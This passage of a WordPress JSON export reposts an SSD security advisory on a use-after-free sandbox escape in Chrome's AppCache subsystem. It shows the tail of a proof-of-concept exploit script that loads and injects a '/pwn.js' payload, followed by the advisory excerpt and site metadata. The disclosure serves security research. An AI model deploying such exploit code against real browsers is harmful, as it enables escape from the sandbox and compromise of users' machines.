class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">js<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">fetchDH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'\/pwn.js'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'script'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">innerHTML<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">js<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-73\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-75\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go_plain<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'script'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setAttribute<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'src'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'\/pwn.js'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-79\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-81\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3786\" target=\"bwo\" 
>https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:23:16 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The vulnerability exists in the AppCache subsystem in Chrome Versions 69.0 and before. This code is located in the privileged browser process outside of the sandbox. The renderer interacts with this subsystem by sending IPC messages from the renderer to the browser process. 
These messages can cause the browser to make network requests, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3786\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome AppCache Subsystem SBX by utilizing a Use After Free<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15244,10757,13145],"class_list":["post-13714","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-sandbox-escape","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13714"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13714\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13714"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}